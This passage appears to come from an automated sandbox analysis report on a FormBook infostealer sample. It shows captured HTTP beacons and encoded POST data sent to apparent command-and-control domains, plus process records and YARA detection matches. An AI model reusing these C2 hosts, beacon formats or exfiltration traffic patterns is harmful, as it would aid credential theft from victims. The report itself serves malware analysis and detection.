                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 48 45 4e 6a 65 59 73 37 71 33 32 78 41 41 33 48 31 51 31 46 63 44 64 4b 47 38 69 5a 6b 5a 4d 30 6e 30 72 38 35 4d 75 4f 6c 4f 35 75 6f 76 38 46 2b 65 6d 48 6d 42 6c 56 35 5a 75 58 54 43 56 5a 6a 79 65 68 42 50 2b 4d 38 4f 58 78 6a 67 6b 50 61 69 56 50 45 55 35 57 4c 2f 46 30 35 32 44 42 43 79 63 7a 6f 46 7a 67 70 45 37 32 53 6a 36 77 4d 74 4d 58 46 7a 76 55 67 65 79 4f 59 6b 52 4a 4f 39 73 44 4f 45 4d 66 37 76 6e 74 66 51 73 62 48 46 30 74 6b 76 4d 4c 67 72 7a 62 75 6f 55 6b 35 73 44 4b 44 50 70 54 30 59 44 4c 51 52 39 4c 34 63 6d 61 71 36 4c 47 54 5a 6d 44 73 35 7a 71 53 68 34 32 49 59 53 4f 75 68 72 6b 77 77 4a 79 54 39 31 45 33 4a 39 69 62 2f 32 79 73 71 32 64 56 55 61 51 43 2f 6b 6f 75 43 6b 58 33 6f 66 6f 58 68 35 33 4f 4e 7a 68 78 73 79 50 5a 34 65 7a 64 6f 59 45 73 4e 66 56 79 70 73 52 52 63 6c 53 6f 67 63 50 34 53 76 51 75 58 44 47 44 42 58 4c 68 56 71 6c 69 58 31 41 39 62 48 6a 37 4e 77 6d 70 79 71 74 33 4a 78 62 62 4d 67 66 35 43 6a 41 4a 36 4b 2f 32 63 32 38 69 52 [TRUNCATED]
                          Data Ascii: dBOL8fg=HENjeYs7q32xAA3H1Q1FcDdKG8iZkZM0n0r85MuOlO5uov8F+emHmBlV5ZuXTCVZjyehBP+M8OXxjgkPaiVPEU5WL/F052DBCyczoFzgpE72Sj6wMtMXFzvUgeyOYkRJO9sDOEMf7vntfQsbHF0tkvMLgrzbuoUk5sDKDPpT0YDLQR9L4cmaq6LGTZmDs5zqSh42IYSOuhrkwwJyT91E3J9ib/2ysq2dVUaQC/kouCkX3ofoXh53ONzhxsyPZ4ezdoYEsNfVypsRRclSogcP4SvQuXDGDBXLhVqliX1A9bHj7Nwmpyqt3JxbbMgf5CjAJ6K/2c28iRMK7BBlm06cJhXdLRBABaIkzmfZLdgrtzk50wkCL5Q/9WzV5Gxf5B+7zsr9AlYBcnNw7qTuwYeRSX4M+evOms8usdjhXYBn/0EA5MtySwLyV61KxXywGFPjReHWWn9uMnWu/vQJfvXazC60oHvssaZ3JQNXNOpxX5NM2GakVqX9GfNBJ8ujKI7hxQreE6ZA9yVFuAhfypPtqF0th4eWvwaJMR10BO8A2ebnXfmFDzxBJoVfUFzsMxEHkNZy1kL0lfWs//ookzO5IvNZGV/2/dPRgqF+Yuw70Uem4xE5KcYFONMLiIr0a2cOdmFTLu4AKcF5gZxpjR9tDHeJD5g02TJH6lAQRQaPKIz2DpneoV1iy9R2zXKvIIuf1YTAMcXB+yiHrCEE0c+ZEqCYy2jhrUxu1TGGsTVoTYplbmlOWPtzbr6KF5hbrABkEHbY/AQrum8PoLvuUvQmz5romcxFLtnYSdZgVLgR+02Ci9+vPuL8zVa1iHesF0uBuWisYAQGk6gKSy8JiGz5OQvlXiVqhWd03RCa26ZIL8HGxtN8WNx3vkCTOCxhZ/VF6aErMGYRPoavQUMMSdPoFhoLBkmO9iUia+02J1wVLfzkjqpehrjiRsLJCihzULUHKfENF8rDDqud21r+zpyNohLBTnntzstnFLI1HseEj0hB [TRUNCATED]
                          Jul 1, 2024 15:12:36.244460106 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:36 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1566
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:36.244477987 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.449757142.250.74.211804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:38.142066956 CEST503OUTGET /jabf/?dBOL8fg=KGlDdtURhni7FGDH6yxlaDZJCfDxicUCgkjw8qWMo8hYydwJ4O2FhRAQ8quBHC5UmxGRc9Sg3+2UwlJVOzJUF0A3C6dQyjGkFiMq3W6NxA+1TkWWAbsUMwI=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.artvectorcraft.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:38.777293921 CEST1236INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:38 GMT
                          Content-Type: text/html; charset=UTF-8
                          Server: ghs
                          Content-Length: 1714
                          X-XSS-Protection: 0
                          X-Frame-Options: SAMEORIGIN
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                          Jul 1, 2024 15:12:38.777333975 CEST685INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.44975843.132.189.227804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:44.166990995 CEST770OUTPOST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 64 64 38 67 70 64 51 7a 42 69 6a 75 6d 55 30 54 33 35 71 71 4b 50 43 6a 6a 50 61 72 61 30 4d 58 38 73 2f 4b 55 37 56 6c 7a 56 44 51 35 6e 44 71 6d 35 32 50 6b 37 65 39 53 33 57 35 4f 41 61 57 45 35 47 70 76 42 69 6e 44 79 6c 7a 62 36 66 59 57 36 4a 64 79 37 4a 68 52 48 2b 61 6e 52 65 57 37 4e 6d 50 2f 38 4e 5a 67 4b 70 67 35 36 38 43 41 63 32 79 46 4d 62 45 77 2b 4f 6a 37 33 59 61 53 77 57 48 66 53 47 47 58 77 4b 52 67 68 2f 32 2f 37 4e 77 47 2b 4a 47 4c 42 2b 6e 58 35 77 5a 74 47 39 6f 52 78 66 56 35 46 36 7a 4a 36 77 71 4c 49 75 2b 73 50 4c 37 4b 51 55 59 39 6b 50 43 46 51 3d 3d
                          Data Ascii: dBOL8fg=dd8gpdQzBijumU0T35qqKPCjjPara0MX8s/KU7VlzVDQ5nDqm52Pk7e9S3W5OAaWE5GpvBinDylzb6fYW6Jdy7JhRH+anReW7NmP/8NZgKpg568CAc2yFMbEw+Oj73YaSwWHfSGGXwKRgh/2/7NwG+JGLB+nX5wZtG9oRxfV5F6zJ6wqLIu+sPL7KQUY9kPCFQ==


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          14192.168.2.44975943.132.189.227804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:46.704902887 CEST790OUTPOST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 64 64 38 67 70 64 51 7a 42 69 6a 75 6d 77 77 54 36 2b 2b 71 49 76 43 73 6f 76 61 72 50 45 4e 51 38 73 6a 4b 55 2b 74 4c 7a 68 76 51 34 47 7a 71 33 4d 61 50 30 72 65 39 4b 6e 58 7a 44 67 62 37 45 35 43 62 76 45 43 6e 44 79 78 7a 62 34 58 59 56 4a 78 63 7a 72 4a 6a 58 48 2b 59 6a 52 65 57 37 4e 6d 50 2f 38 4a 2f 67 4b 78 67 35 4a 6b 43 50 59 43 39 49 73 62 48 33 2b 4f 6a 2f 33 59 57 53 77 58 33 66 58 65 34 58 31 57 52 67 6b 44 32 2f 70 6c 2f 49 2b 4a 45 47 68 2f 46 57 4a 38 57 73 44 78 6a 5a 53 6d 30 2b 52 36 55 4d 38 68 77 61 35 50 70 2b 50 76 49 58 58 64 73 77 6e 79 4c 65 66 6f 71 4d 45 4a 78 4a 33 51 6c 34 59 74 64 4f 52 45 31 74 55 51 3d
                          Data Ascii: dBOL8fg=dd8gpdQzBijumwwT6++qIvCsovarPENQ8sjKU+tLzhvQ4Gzq3MaP0re9KnXzDgb7E5CbvECnDyxzb4XYVJxczrJjXH+YjReW7NmP/8J/gKxg5JkCPYC9IsbH3+Oj/3YWSwX3fXe4X1WRgkD2/pl/I+JEGh/FWJ8WsDxjZSm0+R6UM8hwa5Pp+PvIXXdswnyLefoqMEJxJ3Ql4YtdORE1tUQ=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          15192.168.2.44976043.132.189.227804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:49.236515045 CEST10872OUTPOST /3mcu/ HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.eylmpwjot.store
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.eylmpwjot.store/3mcu/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 64 64 38 67 70 64 51 7a 42 69 6a 75 6d 77 77 54 36 2b 2b 71 49 76 43 73 6f 76 61 72 50 45 4e 51 38 73 6a 4b 55 2b 74 4c 7a 68 6e 51 35 77 76 71 6c 62 75 50 6d 37 65 39 55 33 58 77 44 67 62 44 45 39 75 66 76 45 47 33 44 77 4a 7a 61 64 44 59 64 59 78 63 38 72 4a 6a 62 6e 2b 5a 6e 52 66 4f 37 4e 32 4c 2f 38 5a 2f 67 4b 78 67 35 50 67 43 49 4d 32 39 62 63 62 45 77 2b 4f 52 37 33 5a 44 53 77 66 42 66 54 44 44 55 42 61 52 67 46 7a 32 2b 61 4e 2f 45 2b 4a 38 44 68 2f 6a 57 4a 78 57 73 44 45 61 5a 54 54 68 2b 57 4b 55 4d 4b 77 33 48 6f 33 41 6f 4f 48 4e 42 67 68 79 2b 58 6d 6e 47 66 30 64 41 6b 78 53 66 58 63 65 79 49 38 4d 53 7a 51 71 76 44 5a 5a 33 34 79 4a 6a 48 78 75 72 35 42 58 31 65 50 2f 59 68 49 76 4f 4b 7a 6e 54 47 37 42 74 6e 35 53 5a 5a 50 6e 76 65 76 78 2b 5a 53 6e 6e 58 2b 30 58 59 63 67 43 6a 46 54 5a 46 33 64 78 5a 73 6a 49 30 43 68 61 48 75 77 67 30 57 7a 46 43 33 2b 41 47 39 36 4b 4d 67 6b 57 4f 6e 75 42 5a 66 7a 4c 6d 47 2f 61 63 51 36 37 30 57 6f 6c 56 49 4b 56 79 [TRUNCATED]
                          Data Ascii: dBOL8fg=dd8gpdQzBijumwwT6++qIvCsovarPENQ8sjKU+tLzhnQ5wvqlbuPm7e9U3XwDgbDE9ufvEG3DwJzadDYdYxc8rJjbn+ZnRfO7N2L/8Z/gKxg5PgCIM29bcbEw+OR73ZDSwfBfTDDUBaRgFz2+aN/E+J8Dh/jWJxWsDEaZTTh+WKUMKw3Ho3AoOHNBghy+XmnGf0dAkxSfXceyI8MSzQqvDZZ34yJjHxur5BX1eP/YhIvOKznTG7Btn5SZZPnvevx+ZSnnX+0XYcgCjFTZF3dxZsjI0ChaHuwg0WzFC3+AG96KMgkWOnuBZfzLmG/acQ670WolVIKVysnaw25iE5Iwgv6uvN81sL/63jrNDU5oa5y/kvcYCXQuQ1UH19EYbJ7/Gf8vvjS1/aeu90yJqpV9OXIFJY0Som4WZP8AmHpgtpF7VhdcNPETeeEVF8CwAQZIUB3LoYONJ6BO7j1hj7KMteBQXv23qY+gHcjV4pT4n+tgv/QnZgxZPavMbirc+oojuVN5U09MSOAPyz6q5Qt+grITnMlnVvnYS3eVbV18cDifDOEDnI0pwktojVLjZspW9mYox7mV4/cvrQ0hW9erYWYe1IFrxF1q1T6+eAMi/+hTxHs6KyUXjiaTPBHbF4uz5nEZLnaynDTmWlyONRKUUN0Zzf7IwP3V6ursBr8qMhH582l+CNrenYhKITrsO6EHqXFOazbEOoBAFvhhUSI8AXVAxHPVS7hlIRNOJIUh1HbtKDpxkRQz1ExMOK7w6LXjjoVGEpiARO3m2Ny5PKmVO0O66uvFslKpkGPBf+9J48sC1N1clvkG8eLaobkw4bgE4d/8y/HTWAQ+S+3lnrD8cyeSPekpyJlpDf4GBn/1UloU/VxbyDO7Kqx/LtKN1tc+IDC+eAuINpm302duj3QoWNjn3TADXRZWT6TxsroOXpzxheO2JKxLOqL00aA0ml/u9uS2WvGhoh+S1s3aGR8FysQMoj+uvTTfOPR0xlXEn/5 [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          16192.168.2.44976143.132.189.227804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:51.772454023 CEST498OUTGET /3mcu/?dBOL8fg=QfUAqqYGVyzbjiAj2dnUBJSNi+zHRF4Q6sDLQeB06Snd2Ev4mrer+JTsXVK5M0bFA+ayvTGmBhRWLdOOcrwm0o86bnORrWDNmfnIiMMD3+9d3oxlAeCDNso=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.eylmpwjot.store
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:09:10:58
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\indent PWS-020199.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\indent PWS-020199.exe"
                          Imagebase:0xff0000
                          File size:727'560 bytes
                          MD5 hash:66800CAE69C4278C8A33921D624B7528
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:09:11:00
                          Start date:01/07/2024
                          Path:C:\Users\user\Desktop\indent PWS-020199.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\indent PWS-020199.exe"
                          Imagebase:0x8f0000
                          File size:727'560 bytes
                          MD5 hash:66800CAE69C4278C8A33921D624B7528
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:4
                          Start time:09:11:22
                          Start date:01/07/2024
                          Path:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe"
                          Imagebase:0x630000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:7
                          Start time:09:11:23
                          Start date:01/07/2024
                          Path:C:\Windows\SysWOW64\netiougc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\netiougc.exe"
                          Imagebase:0x7d0000
                          File size:25'600 bytes
                          MD5 hash:DD8D09523CDB5610078DF64BA4889806
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          General

                          Target ID:8
                          Start time:09:11:36
                          Start date:01/07/2024
                          Path:C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe"
                          Imagebase:0x630000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          General

                          Target ID:10
                          Start time:09:11:53
                          Start date:01/07/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x7ff6bf500000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:11.3%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:240
                            Total number of Limit Nodes:18
